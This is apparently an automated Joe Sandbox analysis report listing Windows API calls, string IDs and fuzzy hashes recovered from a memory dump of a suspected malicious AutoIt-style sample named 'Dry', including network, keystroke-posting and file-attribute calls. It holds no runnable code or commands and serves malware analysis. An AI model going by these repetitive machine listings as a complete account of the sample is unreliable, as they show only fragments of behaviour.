                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B13029
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B13034
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B1303F
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B1304A
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B13055
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B13060
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B1306E
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 6ca3c6b4cd78dd2973a4e3eb549f82e43367f63928f4a59aed3a2dd842ef7156
                                                                                                                                                                                                                                                                                    • Instruction ID: ec3c1a174ef9ed7dd3ee1466bf64a3a62b39cebe996e09b881d6c34eb39ce6d9
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ca3c6b4cd78dd2973a4e3eb549f82e43367f63928f4a59aed3a2dd842ef7156
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 841142B6510108AFCB05EF94D942DDD3BE5EF09350BD145E5FA089B222DA32EBA19B90
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00AE2AF9
                                                                                                                                                                                                                                                                                    • OleUninitialize.OLE32(?,00000000), ref: 00AE2B98
                                                                                                                                                                                                                                                                                    • UnregisterHotKey.USER32(?), ref: 00AE2D7D
                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00B23A1B
                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00B23A80
                                                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00B23AAD
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                                                                                                                    • String ID: close all
                                                                                                                                                                                                                                                                                    • API String ID: 469580280-3243417748
                                                                                                                                                                                                                                                                                    • Opcode ID: 363b7799ec531a06d9a45867edd2604acdfe04c69de79b81c10d8f335e92db06
                                                                                                                                                                                                                                                                                    • Instruction ID: 85b4cf137526cac8293f77068c7c86c89b2bc7a75cc475c84fd0b5c0a0f057e9
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 363b7799ec531a06d9a45867edd2604acdfe04c69de79b81c10d8f335e92db06
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2D156716012628FCB29EF15D989B69F7F4EF05B50F1042EDE94AAB261CB31AD52CF40
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B589F2
                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00B58A06
                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00B58A30
                                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00B58A4A
                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00B58A5C
                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00B58AA5
                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B58AF5
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: CurrentDirectory$AttributesFile
• String ID: *.*
• API String ID: 769691225-438819550
• Opcode ID: f60be802e30b1208b6d8c11cfb7e8cbb38a56493507a9c7c575ffc571fafbf84
• Instruction ID: 9b0d5afaf62b8c33b48383e60f1f96428cd38bd9613d079e8d8c8ac350b2c977
• Opcode Fuzzy Hash: f60be802e30b1208b6d8c11cfb7e8cbb38a56493507a9c7c575ffc571fafbf84
• Instruction Fuzzy Hash: 18819F729043459BCB24EF14C484BBAB3E8FF84311F5448DAF889EB251DF34D9498B92
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 00AE74D7
  • Part of subcall function 00AE7567: GetClientRect.USER32(?,?), ref: 00AE758D
  • Part of subcall function 00AE7567: GetWindowRect.USER32(?,?), ref: 00AE75CE
  • Part of subcall function 00AE7567: ScreenToClient.USER32(?,?), ref: 00AE75F6
• GetDC.USER32 ref: 00B26083
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00B26096
• SelectObject.GDI32(00000000,00000000), ref: 00B260A4
• SelectObject.GDI32(00000000,00000000), ref: 00B260B9
• ReleaseDC.USER32(?,00000000), ref: 00B260C1
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00B26152
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
• API String ID: 4009187628-3372436214
• Opcode ID: cd7a19654adf0f771abb0947387e2c8ccd541ce96c19715d36e1cca27d5cdd31
• Instruction ID: b0a0ee504f7b21242512bfadd5e04fff799279cc7591fe62e675c72618c0c4e0
• Opcode Fuzzy Hash: cd7a19654adf0f771abb0947387e2c8ccd541ce96c19715d36e1cca27d5cdd31
• Instruction Fuzzy Hash: 1D71E030500255DFCF25DF64EC84AAA3BF1FF48321F1446A9ED596A2A6CB319C90EB50
APIs
  • Part of subcall function 00AE249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00AE24B0
  • Part of subcall function 00AE19CD: GetCursorPos.USER32(?), ref: 00AE19E1
  • Part of subcall function 00AE19CD: ScreenToClient.USER32(00000000,?), ref: 00AE19FE
  • Part of subcall function 00AE19CD: GetAsyncKeyState.USER32(00000001), ref: 00AE1A23
  • Part of subcall function 00AE19CD: GetAsyncKeyState.USER32(00000002), ref: 00AE1A3D
• ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00B795C7
• ImageList_EndDrag.COMCTL32 ref: 00B795CD
• ReleaseCapture.USER32 ref: 00B795D3
• SetWindowTextW.USER32(?,00000000), ref: 00B7966E
• SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00B79681
• DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00B7975B
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
• String ID: @GUI_DRAGFILE$@GUI_DROPID
• API String ID: 1924731296-2107944366
• Opcode ID: 5bb7ed27f7af1e909c5451aee5526b9461f339759b52f612b093d7c8475a7229
• Instruction ID: 52b109648a331ad49aad42c81786b409201a305494afadd3ac4f5d0de926b1c3
• Opcode Fuzzy Hash: 5bb7ed27f7af1e909c5451aee5526b9461f339759b52f612b093d7c8475a7229
• Instruction Fuzzy Hash: 97516C71104340AFD714EF24CC9AFAA77E4FF84754F400A68F9AA972E1DBB19944CB52
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B5CCB7
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B5CCDF
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B5CD0F
• GetLastError.KERNEL32 ref: 00B5CD67
• SetEvent.KERNEL32(?), ref: 00B5CD7B
• InternetCloseHandle.WININET(00000000), ref: 00B5CD86
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
• String ID:
• API String ID: 3113390036-3916222277
• Opcode ID: ab9146013880b14bf930850fd010372d881863a40bb364be7939f26f4cc8eebd
• Instruction ID: e5c52981f39bfaa5fc552e1c870d3aef820a00c5a551d417d0fb66d0d428604e
• Opcode Fuzzy Hash: ab9146013880b14bf930850fd010372d881863a40bb364be7939f26f4cc8eebd
• Instruction Fuzzy Hash: 0D318D71500308AFD721AF648C88BAB7FFDEF45781B1045AAF84AD3240DB30ED499B60
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00B255AE,?,?,Bad directive syntax error,00B7DCD0,00000000,00000010,?,?), ref: 00B4A236
• LoadStringW.USER32(00000000,?,00B255AE,?), ref: 00B4A23D
  • Part of subcall function 00AEB329: _wcslen.LIBCMT ref: 00AEB333
• MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00B4A301
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                                                                                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                                                                                                    • API String ID: 858772685-4153970271
                                                                                                                                                                                                                                                                                    • Opcode ID: de350a67d032ca9995f9f06066bfd03832045d7c0e0b698360b16ac92a28e850
                                                                                                                                                                                                                                                                                    • Instruction ID: ddf3d13686802ea08a73cda3844377dccc799fed6f4219b3c47089b7c2132a27
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: de350a67d032ca9995f9f06066bfd03832045d7c0e0b698360b16ac92a28e850
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA21A83189425EEFCF01AF90CC4AEEE7BB9FF18700F004495F515660A2EB71A658EB11
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetParent.USER32 ref: 00B429F8
                                                                                                                                                                                                                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00B42A0D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00B42A9A
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ClassMessageNameParentSend
                                                                                                                                                                                                                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                                                                                    • API String ID: 1290815626-3381328864
                                                                                                                                                                                                                                                                                    • Opcode ID: 950cb5e39ef22edf07193fd43f2047b6bfa233e5bf7f07d0eb8d3f3c32122d48
                                                                                                                                                                                                                                                                                    • Instruction ID: cafeda3c07853132ad4d9da6e49e65831838fa3ee328a19a1d5e9927cf400088
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 950cb5e39ef22edf07193fd43f2047b6bfa233e5bf7f07d0eb8d3f3c32122d48
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D11A3B6648306B9FA2467209C07DA63BECDF16764BA001A2FA04E50E1FF61AD417514
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00AE758D
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00AE75CE
                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00AE75F6
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00AE773A
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00AE775B
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Rect$Client$Window$Screen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1296646539-0
                                                                                                                                                                                                                                                                                    • Opcode ID: ed1c0c3703aeefb030ebdcc0ef0f1f0418c47d3491b2b28941ddc27e9a824850
                                                                                                                                                                                                                                                                                    • Instruction ID: 4e91d8820dd4a2457d859ee3816aa730db5bef9b976145be4f866955de0d59ad
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed1c0c3703aeefb030ebdcc0ef0f1f0418c47d3491b2b28941ddc27e9a824850
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AC16B7990465AEFDB10CFA9C980BEDBBF1FF18314F14841AE899E3250DB34A951DB60
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1282221369-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 06e60326e7cf9713f2822e73cd590c0027eeedc45882e40276468a7c6645c2f5
                                                                                                                                                                                                                                                                                    • Instruction ID: 7b118e95008dd1b3da9e5ef5522f5b6fa1696ac137a8857fe35f54a155d6037c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06e60326e7cf9713f2822e73cd590c0027eeedc45882e40276468a7c6645c2f5
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C6126B1A04315AFDB25AF78E8827EE7BE4DF01320FD406FDE914A7285DB7199808791
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00B75C24
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00B75C65
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000005,?,00000000), ref: 00B75C6B
                                                                                                                                                                                                                                                                                    • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00B75C6F
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B779F2: DeleteObject.GDI32(00000000), ref: 00B77A1E
                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00B75CAB
                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B75CB8
                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00B75CEB
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00B75D25
• SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00B75D34
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
• String ID:
• API String ID: 3210457359-0
• Opcode ID: 6b3d753db158313158ed84a6caa36f46e97684e13790427b533b46307b5c7cd3
• Instruction ID: 491fc55a2b14b6f34b3816bfd082bca6f1cbba04b8e7b803914f3154934ee1df
• Opcode Fuzzy Hash: 6b3d753db158313158ed84a6caa36f46e97684e13790427b533b46307b5c7cd3
• Instruction Fuzzy Hash: BD516130640A08BFEF359F24CC49F983BE5EB04750F14C195B53DAA2E1CBB5A980DB81
APIs
• LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00B228D1
• ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00B228EA
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00B228FA
• ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00B22912
• SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00B22933
• DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00AE11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00B22942
• SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00B2295F
• DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00AE11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00B2296E
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Icon$DestroyExtractImageLoadMessageSend
• String ID:
• API String ID: 1268354404-0
• Opcode ID: 04379a8ca1881d3440bbb429a3b5c59d0798f1526da537c462d858c38edafa6b
• Instruction ID: eb06c5773996dc57ddc75a8b7f752fa1782e16f2e2ab0982a8e1e16c033729c9
• Opcode Fuzzy Hash: 04379a8ca1881d3440bbb429a3b5c59d0798f1526da537c462d858c38edafa6b
• Instruction Fuzzy Hash: 38516870600259AFDB24CF26CC45BAA7BF5EF48750F104528F95ADB2E0DB70E990DB50
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B5CBC7
• GetLastError.KERNEL32 ref: 00B5CBDA
• SetEvent.KERNEL32(?), ref: 00B5CBEE
  • Part of subcall function 00B5CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B5CCB7
  • Part of subcall function 00B5CC98: GetLastError.KERNEL32 ref: 00B5CD67
  • Part of subcall function 00B5CC98: SetEvent.KERNEL32(?), ref: 00B5CD7B
  • Part of subcall function 00B5CC98: InternetCloseHandle.WININET(00000000), ref: 00B5CD86
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
• String ID:
• API String ID: 337547030-0
• Opcode ID: de6fccbd8eeef6ba6972fe6fcd71b9b5eed17a3a8da4c9e2e26d2bc2f6f701db
• Instruction ID: d3541bd319e06de5d1b91be1e1137de435a5aeaa9257e694c07f54d44d74aacb
• Opcode Fuzzy Hash: de6fccbd8eeef6ba6972fe6fcd71b9b5eed17a3a8da4c9e2e26d2bc2f6f701db
• Instruction Fuzzy Hash: F2318971200705AFCB218F65CD84B6ABFFAFF04342B0045ADF85E87610CB30E859ABA0
APIs
  • Part of subcall function 00B44393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B443AD
  • Part of subcall function 00B44393: GetCurrentThreadId.KERNEL32 ref: 00B443B4
  • Part of subcall function 00B44393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00B42F00), ref: 00B443BB
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00B42F0A
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00B42F28
• Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00B42F2C
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00B42F36
• PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00B42F4E
• Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00B42F52
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00B42F5C
